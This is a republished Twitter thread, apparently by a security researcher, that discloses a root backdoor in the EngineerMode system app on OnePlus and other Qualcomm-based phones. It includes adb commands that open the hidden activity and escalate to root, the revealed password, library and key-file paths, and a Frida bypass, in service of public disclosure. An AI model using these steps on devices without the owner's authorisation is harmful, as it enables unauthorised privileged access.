<Thread> Hey @OnePlus! I don't think this EngineerMode APK must be in an user build...🤦♂️
This app is a system app made by @Qualcomm and customised by @OnePlus. It's used by the operator in the factory to test the devices.
If you have an OnePlus device, I'm pretty sure you have this app pre-installed. To check open Settings -> Apps -> Menu -> Show system apps and search EngineerMode in the app list to check
With telephony secret code you can access to manual tests like GPS test, root status test as stated in this article xda-developers.com/oneplus-hardwa… pointed by @AleGrechi . But can do better...
You can access to the "main" activity by sending this command: adb shell am start com.android.engineeringmode/.EngineeringMode
You will have access to everything, not just the manual test.
Having access to all these functions is a real issue. Combined with this attack, researchcenter.paloaltonetworks.com/2017/09/unit42…, a malicious app can do a lot of thing.
I will find time to make a POC.
But it's not the biggest issue with this app.
The DiagEnabled, which is a @Qualcomm made activity, is the best class in this EngineerMode APK. Check the methods in this activity: escalatedUp(boolean, string) sounds like a cool thing no 😀?
In the onCreate method if the intent is not null the escalatedUp method is called with the parameter enable=true and password=getIntent().getStringExtra("code"). Do you see where I'm going?
The escalatedUp method is calling Privilege.escalate(password) and if the result is true, it set the system property persist.sys.adbroot and oem.selinux.reload_policy to 1
So yes, if you send the command: adb shell am start -n com.android.engineeringmode/.qualcomm.DiagEnabled --es "code" "password" with the correct code you can become root!
Here the Privilege class. Check the name of native library used to check the code: door... Ladies and Gentlemen please say hi to the backdoor made in @Qualcomm
This lib is located in /system/lib/libdoor.so or /system/lib64/libdoor.so. You can find the sample here: virustotal.com/#/file/3e6df25…
This is the interesting strings of the lib. After a first read we can see that libcrypto is used and the key and the password are backup in /data/backup/fpwd and /data/backup/fkey
This is the code responsible of the password verification. 1st it check the length, calculate the hash and compare it to the correct one.
Unfortunately, I didn't find the password, so if some you are skilled in reversing native lib, your help is very welcome!
If the verification is passed the password hash is stored in /data/backup/fpwd
and the key is made from different build properties like ro.build .type, ro.build .user,... and stored in /data/backup/fkey
Using @fridadotre and the script attached, I managed to bypass the escalate and isEscalated methods and become root
Here the source code of the EngineerMode apk: github.com/fs0c131y/Engin…. Feel free to dig on your own and share your findings!
cc @AndroidAuth @AndroidPolice @androidandme @Androidheadline @AndroidPolice @xdadevelopers @AndroidSPIN @Gadgets360 @TheHackersNews you have a subject here to write an article. It's not normal to have this kind of backdoor in an end user product...
EngineerMode APK is not the only interesting app left by @Oneplus. More thread to come :)
Awesome! Thanks to @insitusec and the @NowSecureMobile team, we have the password! It's now possible to root an @Oneplus device with a simple intent
I will publish an application on the PlayStore to root your @OnePlus device in the next hours
cc @JAMESWT_MHT I forgot to add you :)
Difficulty to install #SuperSu: 0! Everything is already preinstalled 🤔.
The OnePlus root application is coming soon :)
Nice report @AndroidPolice androidpolice.com/2017/11/13/one…
The best thing in this story is the password. It's angela (see the reference?). This backdoor is here intentionally. When the fiction become a reality. Good luck @getpeid, you will need a very good explanation.
cc @whoismrrobot
My Twitter at the moment. Thank you all for the impact you give to this story!
Once again this app is a system app made by @Qualcomm. So possibly a lot of @Qualcomm based phones are affected. Can you open Settings -> Apps -> Menu -> Show system apps and search EngineerMode in the list to check? If you find the app reply to this tweet with your device model
Thanks to you, I have now a sample of the EngineerMode apk from @Asus Zenfone, @miuirom, @Redmi 3s, @OnePlus 5T. Expect more fun!
I'm still waiting more samples to confirm but yes EngineerMode is installed on @OnePlus 5T. The DiagEnabled activity is here, so the backdoor too :)
Thanks to the awesome @AdrianoDiLuzio, it's pretty easy to install supersu!
Write up made by @AdrianoDiLuzio to root your OnePlus device using the backdoor + #Magisk: gist.github.com/aldur/b785257a…
Share this Scrolly Tale with your friends.
A Scrolly Tale is a new way to read Twitter threads with a more visually immersive experience.
Discover more beautiful Scrolly Tales like this.